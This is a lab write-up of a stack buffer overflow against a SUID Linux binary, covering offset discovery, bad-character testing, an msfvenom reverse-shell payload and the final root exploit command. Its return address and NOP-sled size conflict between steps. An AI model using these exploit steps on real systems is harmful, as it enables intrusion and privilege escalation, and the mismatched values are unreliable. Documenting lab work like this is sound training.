While attempting a different reverse engineering / pwn challenge, I realized I needed more background on how to properly perform a buffer overflow, so I took HTB Academy's Stack-Based Buffer Overflows on Linux x86 module. This is my writeup of its final Skills Assessment.

Discovery

First we need to see what kind of file we are working with and get some starting addresses. Then we start debugging to see whether we can overflow the buffer far enough to overwrite eip.

htb-student@nixbof32skills:~$ objdump -f leave_msg 
 leave_msg:     file format elf32-i386
 architecture: i386, flags 0x00000150:
 HAS_SYMS, DYNAMIC, D_PAGED
 start address 0x00000550

The objdump -f output gives us the file format (elf32-i386), the architecture (i386) and the start address (0x550) of the binary.
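The same facts can also be read straight from the ELF header. The sketch below is my own illustration, not part of the course. It assumes a little-endian ELF file and decodes only the class, type and machine fields. An ELF type of DYN is what objdump reports as DYNAMIC. Together with the very small addresses in the disassembly further down, that suggests a position-independent binary.

```python
import struct

# Lookup tables for the few header values this sketch cares about.
ELF_CLASS = {1: "ELF32", 2: "ELF64"}
ELF_TYPE = {2: "EXEC", 3: "DYN"}          # DYN = shared object or PIE executable
ELF_MACHINE = {3: "i386", 62: "x86-64"}

def elf_summary(header: bytes) -> dict:
    """Decode class, type and machine from the first 20 bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if header[5] != 1:
        raise ValueError("this sketch only handles little-endian ELF")
    # e_ident is 16 bytes; e_type and e_machine follow as two 16-bit fields.
    e_type, e_machine = struct.unpack_from("<HH", header, 16)
    return {
        "class": ELF_CLASS.get(header[4], "unknown"),
        "type": ELF_TYPE.get(e_type, hex(e_type)),
        "machine": ELF_MACHINE.get(e_machine, hex(e_machine)),
    }
```

On the target this would be called as `elf_summary(open("leave_msg", "rb").read(20))`. Given objdump's output, I'd expect ELF32 and i386, which matters later when picking a 32-bit payload on a 64-bit host.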

If I try to disassemble with objdump -d, my terminal hangs when it reaches the main function. Running the program on its own causes an immediate segmentation fault. I found this a bit odd, but resetting the machine didn't change it, so it must be intended.

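It turns out the program expects a command-line argument, which it writes to /home/htb-student/msg.txt. Each run wipes the file and writes the new message. This also explains the crash above. The disassembly of main below loads argv[1] and passes it straight to leavemsg without checking argc, so with no argument leavemsg is most likely handed a NULL pointer.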

Determining Buffer Overflow Vulnerability

Through some trial and error, I sent increasingly long runs of \x55 bytes to the program. Somewhere between 2000 and 2100 bytes it crashes with a segmentation fault. We can find the exact offset with two Metasploit scripts.

First, pattern_create.rb gives us a 2100-byte cyclic pattern, a length we know will cause a segmentation fault:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2100

Next, back in gdb we can paste this in with python:

run $(python -c "print 'Aa0Aa1Aa2Aa3...6Cr7Cr8Cr9'")
...

Program received signal SIGSEGV, Segmentation fault.
0x37714336 in ?? ()

The program crashes, and thanks to the pattern, eip holds a unique value. We feed this value to another Metasploit tool, pattern_offset.rb, to get the exact number of bytes needed to reach the saved return address that gets loaded into eip:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x37714336
[*] Exact match at offset 2060
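To see why this works, here is a small re-implementation sketch of the cyclic pattern idea. It is my own code, not Metasploit's. It assumes the pattern is built from uppercase, lowercase and digit triplets (Aa0Aa1...), which matches the start and end of the pattern pasted into gdb above. The crashing eip value is unpacked little-endian into four characters, and their position in the pattern is the offset.

```python
import string
import struct

def pattern_create(length: int) -> str:
    """Cyclic pattern of Upper/lower/digit triplets: Aa0Aa1...Az9Ba0... (max 20280 chars)."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    raise ValueError("patterns longer than 20280 characters are not supported here")

def pattern_offset(eip_value: int, length: int = 2100) -> int:
    """Offset of the 4 bytes held in eip within the pattern, or -1 if not found."""
    needle = struct.pack("<I", eip_value).decode("latin-1")  # 0x37714336 -> "6Cq7"
    return pattern_create(length).find(needle)

print(pattern_offset(0x37714336))  # 2060
```

This agrees with pattern_offset.rb. The four bytes 36 43 71 37 spell "6Cq7", which appears only once in a 2100-byte pattern.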

Taking Control of the `eip`

Voila! We now know it takes 2060 bytes to reach eip. We can verify this with a simple test payload:

run $(python -c "print '\x55' * 2060 + '\x66' * 4")
...
Program received signal SIGSEGV, Segmentation fault.
0x66666666 in ?? ()

This fills the buffer with \x55 bytes and overwrites the saved return address with \x66 bytes, which end up in eip. Running info registers confirms it (trimmed for easy reading):

(gdb) info registers
...
 ebx            0x55555555       1431655765
...
 ebp            0x55555555       0x55555555
...
 eip            0x66666666       0x66666666
...

Now we know how to overflow the buffer and take control of eip, so we can point it at our own malicious address.
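The `python -c "print ..."` one-liners in this writeup are Python 2, where print writes raw bytes. If only Python 3 is available, print encodes text as UTF-8, so a byte like \x90 would become the two bytes c2 90 and corrupt the payload. Here is a sketch of the same test argument written as raw bytes. The constant name is my own.

```python
import sys

OFFSET_TO_EIP = 2060  # found with pattern_offset.rb above

def eip_test_payload(offset: int = OFFSET_TO_EIP) -> bytes:
    """0x55 filler up to the saved return address, then four 0x66 bytes for eip."""
    return b"\x55" * offset + b"\x66" * 4

def emit(payload: bytes) -> None:
    """Write raw bytes to stdout; print() would UTF-8 encode any byte >= 0x80."""
    sys.stdout.buffer.write(payload)
```

In gdb the equivalent would be `run $(python3 -c 'import sys; sys.stdout.buffer.write(b"\x55" * 2060 + b"\x66" * 4)')`.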

Identify initial payload length

Now we need to generate a payload with msfvenom. Running uname -a shows an Ubuntu x86_64 Linux machine, but leave_msg itself is a 32-bit i386 binary, so we need an x86 payload:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=4444 --platform linux --format c
...
Payload size: 74 bytes
...

This tells us our payload is 74 bytes.

Before we use our payload, we need to identify any bad characters it must not contain. To find them, we send all 256 possible byte values where the shellcode will go, which takes a little math:

 Buffer = "\x55" * (2064 - 256 - 4) = 1804
  CHARS = "\x00\x01\x02...\xfe\xff" # 256
    EIP = "\x66" * 4

So our buffer gets 1804 bytes, our character string is 256 bytes, and our eip is 4 bytes, for 2064 bytes in total.
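Here is the same layout as a short Python 3 sketch, assuming the 2060-byte offset found earlier. The names are my own. It builds the bad-character test argument and makes the 1804-byte filler fall out of the arithmetic rather than being typed by hand.

```python
OFFSET_TO_EIP = 2060           # bytes before the saved return address
TOTAL_LEN = OFFSET_TO_EIP + 4  # filler + test chars + 4-byte eip = 2064

def bad_char_test_payload() -> bytes:
    """0x55 filler, then every byte 0x00..0xff, then a 0x66 placeholder for eip."""
    chars = bytes(range(256))
    eip = b"\x66" * 4
    filler = b"\x55" * (TOTAL_LEN - len(chars) - len(eip))  # 2064 - 256 - 4 = 1804
    return filler + chars + eip
```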

We will need to set a breakpoint so we can investigate the memory without the program crashing:

(gdb) disas main
Dump of assembler code for function main:
    0x0000073b <+0>:     lea    0x4(%esp),%ecx
    0x0000073f <+4>:     and    $0xfffffff0,%esp
    0x00000742 <+7>:     pushl  -0x4(%ecx)
    0x00000745 <+10>:    push   %ebp
    0x00000746 <+11>:    mov    %esp,%ebp
    0x00000748 <+13>:    push   %esi
    0x00000749 <+14>:    push   %ebx
    0x0000074a <+15>:    push   %ecx
    0x0000074b <+16>:    sub    $0xc,%esp
    0x0000074e <+19>:    call   0x590 <__x86.get_pc_thunk.bx>
    0x00000753 <+24>:    add    $0x1869,%ebx
    0x00000759 <+30>:    mov    %ecx,%esi
    0x0000075b <+32>:    sub    $0x4,%esp
    0x0000075e <+35>:    push   $0x0
    0x00000760 <+37>:    push   $0x0
    0x00000762 <+39>:    push   $0x0
    0x00000764 <+41>:    call   0x4b0 <setresuid@plt>
    0x00000769 <+46>:    add    $0x10,%esp
    0x0000076c <+49>:    mov    0x4(%esi),%eax
    0x0000076f <+52>:    add    $0x4,%eax
    0x00000772 <+55>:    mov    (%eax),%eax
    0x00000774 <+57>:    sub    $0xc,%esp
    0x00000777 <+60>:    push   %eax
    0x00000778 <+61>:    call   0x68d <leavemsg>
    0x0000077d <+66>:    add    $0x10,%esp
    0x00000780 <+69>:    sub    $0xc,%esp
    0x00000783 <+72>:    lea    -0x175c(%ebx),%eax
    0x00000789 <+78>:    push   %eax
    0x0000078a <+79>:    call   0x4f0 <puts@plt>
    0x0000078f <+84>:    add    $0x10,%esp
    0x00000792 <+87>:    mov    $0x0,%eax
    0x00000797 <+92>:    lea    -0xc(%ebp),%esp
    0x0000079a <+95>:    pop    %ecx
    0x0000079b <+96>:    pop    %ebx
    0x0000079c <+97>:    pop    %esi
    0x0000079d <+98>:    pop    %ebp
    0x0000079e <+99>:    lea    -0x4(%ecx),%esp
    0x000007a1 <+102>:   ret

The best breakpoint would be at 0x778, where main calls the actual leavemsg function. These addresses are only offsets (the binary appears to be position-independent), so it is simpler to run break leavemsg and break on the function name.

Now we use this information to craft our actual test payload:

(gdb) run $(python -c 'print "\x55" * (2064 - 256 - 4) + "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4')

Once we hit enter, it will pretty immediately hit the breakpoint for our function. Now is the time to examine the memory.

We can do so with x/2000xb $esp+750. The important part of this step is to find any characters that are missing or altered in memory and record them so msfvenom does not use them in its payload.
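Scanning 2000 bytes by eye is error-prone, so here is a rough helper sketch. It is not from the course, and it assumes gdb's usual `x/xb` layout of an address, a colon, then hex bytes. It turns the pasted dump back into bytes and lists which test characters never appear.

```python
from __future__ import annotations
import re

def parse_gdb_xb(dump: str) -> bytes:
    """Turn gdb x/NNxb output lines ("0xffffd5e8:  0x55  0x01 ...") into raw bytes."""
    data = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue  # skip blank or non-dump lines
        _, values = line.split(":", 1)  # drop the address (and any <symbol+off>) column
        data.extend(int(v, 16) for v in re.findall(r"0x[0-9a-fA-F]{2}\b", values))
    return bytes(data)

def missing_bytes(expected: bytes, observed: bytes) -> list[int]:
    """Bytes from `expected` that never show up in `observed` (presence check only)."""
    seen = set(observed)
    return [b for b in expected if b not in seen]
```

Usage would be `missing_bytes(bytes(range(256)), parse_gdb_xb(pasted_dump))`. This only checks presence, so a byte such as 0x00 that also occurs elsewhere in the dump (for example as a string terminator) will not be flagged. The region around the test characters is still worth reading by eye.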

Here is what I found:

\x00\x09\x0a\x20
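These four bytes line up with how the payload is delivered, which is one likely explanation for them. An argv entry is a C string and can never contain \x00. The $(...) is also unquoted, so the shell splits its output into separate arguments on space, tab and newline (\x20, \x09, \x0a). The sketch below models that behaviour. It assumes bash with the default IFS, since bash drops NUL bytes from command substitution output.

```python
from __future__ import annotations
import re

def shell_argv(raw: bytes) -> list[bytes]:
    """Rough model of bash expanding an unquoted $(...): NUL bytes are dropped,
    then the output is split on runs of space, tab and newline (default IFS)."""
    no_nul = raw.replace(b"\x00", b"")
    return [word for word in re.split(rb"[ \t\n]+", no_nul) if word]

def lost_bytes(raw: bytes) -> list[int]:
    """Byte values present in `raw` that no resulting argument receives."""
    delivered = set(b"".join(shell_argv(raw)))
    return sorted(set(raw) - delivered)

test_arg = b"\x55" * 1804 + bytes(range(256)) + b"\x66" * 4
print([hex(b) for b in lost_bytes(test_arg)])  # ['0x0', '0x9', '0xa', '0x20']
print(len(shell_argv(test_arg)))               # 3
```

The second line of output shows the other side effect. With these bytes in the payload, the argument is split in three, so argv[1] ends early and the rest lands in argv[2] and argv[3].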

We pass these to msfvenom's --bad-chars option so the encoder avoids them.

Generate final payload

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 --bad-chars="\x00\x09\x0a\x20" --platform linux --format c
...
Payload size: 95 bytes
...

Now we need to take the payload output and combine it into one big string.
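Instead of stitching the quoted lines together by hand, the escapes can be collected with a regular expression. This is a minimal sketch that assumes msfvenom's `--format c` output of quoted `"\x.."` lines. The sample below is dummy data, not real shellcode.

```python
import re

def parse_c_buffer(text: str) -> bytes:
    """Join every \\xNN escape in msfvenom's `--format c` output into one bytes object."""
    return bytes.fromhex("".join(re.findall(r"\\x([0-9a-fA-F]{2})", text)))

# Dummy stand-in for msfvenom output (NOT real shellcode).
SAMPLE = r'''unsigned char buf[] =
"\xde\xad\xbe\xef"
"\x41\x42";'''

BAD_CHARS = b"\x00\x09\x0a\x20"
shellcode = parse_c_buffer(SAMPLE)
print(len(shellcode), shellcode.hex())            # 6 deadbeef4142
print(any(b in BAD_CHARS for b in shellcode))     # False
```

On the real output, the length check should report the 95 bytes msfvenom printed, and the bad-character check should stay False.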

With the shellcode in hand, one last calculation gives the final buffer and NOP sizes:

    Buffer = "\x55" * (2064 - 100 - 95 - 4) = 1865
      NOPs = "\x90" * 100
 Shellcode = "\xbd\x95\xf6...\x02\xce" #95
       EIP = "\x66" * 4
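The same arithmetic as a Python 3 sketch is below. The helper names are hypothetical, and the shellcode is a placeholder of 95 `\xcc` bytes rather than the real msfvenom output. The filler size is derived from the other parts so the total always stays at 2064 bytes.

```python
TOTAL_LEN = 2064  # 2060 bytes to the saved return address + 4 bytes of eip

def filler_length(nops: int, shellcode_len: int, eip_len: int = 4, total: int = TOTAL_LEN) -> int:
    """Number of 0x55 filler bytes left once NOPs, shellcode and eip are placed."""
    remaining = total - nops - shellcode_len - eip_len
    if remaining < 0:
        raise ValueError("NOP sled + shellcode do not fit before eip")
    return remaining

def build_payload(shellcode: bytes, nops: int, ret: bytes) -> bytes:
    """filler | NOP sled | shellcode | 4-byte return address."""
    if len(ret) != 4:
        raise ValueError("return address must be 4 bytes")
    filler = b"\x55" * filler_length(nops, len(shellcode))
    return filler + b"\x90" * nops + shellcode + ret

print(filler_length(100, 95))  # 1865
print(filler_length(124, 95))  # 1841
```

Because the filler shrinks by exactly as much as the sled grows, the shellcode starts 1965 bytes into the argument either way. That applies both to the 100-NOP layout here and the 124-NOP layout used in the final command.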

We drop these pieces into the same run $(python -c 'print ...') command in gdb.

Find address for payload

Running the new payload in gdb hits the breakpoint again. Now we need to find an address a line or two into the NOPs, before our shellcode appears, and use that address for eip. Our shellcode starts with 0xbd 0x95 0xf6 ... and will be the first bytes after the sequence of `0x90` bytes.

Our shellcode starts at 0xffffd73a. I'm going to set eip a bit earlier, at 0xffffd72a, so execution lands in the NOP sled and slides into the shellcode. x86 is little-endian, so the address is written as "\x2a\xd7\xff\xff".
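Packing the address by hand is easy to get backwards. This small sketch uses Python's `struct` module. The `p32` name only borrows pwntools' naming convention; this is plain `struct`. It also checks that the packed address itself contains none of the bad characters found earlier.

```python
import struct

BAD_CHARS = b"\x00\x09\x0a\x20"  # from the bad-character test above

def p32(addr: int) -> bytes:
    """Pack a 32-bit address in little-endian byte order."""
    return struct.pack("<I", addr)

def contains_bad(data: bytes, bad: bytes = BAD_CHARS) -> bool:
    """True if any byte of `data` is one of the bad characters."""
    return any(b in bad for b in data)

ret = p32(0xffffd72a)
print(ret.hex(), contains_bad(ret))  # 2ad7ffff False
```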

Execute final payload

We replace the "\x66" * 4 in our run command with this new address. Then open a second terminal and start a listener with nc -lvnp 4444 so the reverse shell can connect back. The binary is SUID root, but a program traced by gdb does not get its SUID privileges, so a shell spawned under gdb would only run as the user gdb is running as.

So instead of doing another (gdb) run command, quit gdb and in the main shell run:

./leave_msg $(python -c 'print "\x55" * (2064 - 124 - 95 - 4) + "\x90" * 124 + "<payload>" + "\x3a\xd7\xff\xff"')

Our nc listener lights up, and whoami tells us we are root! Let's grab the flag in /root/flag.txt.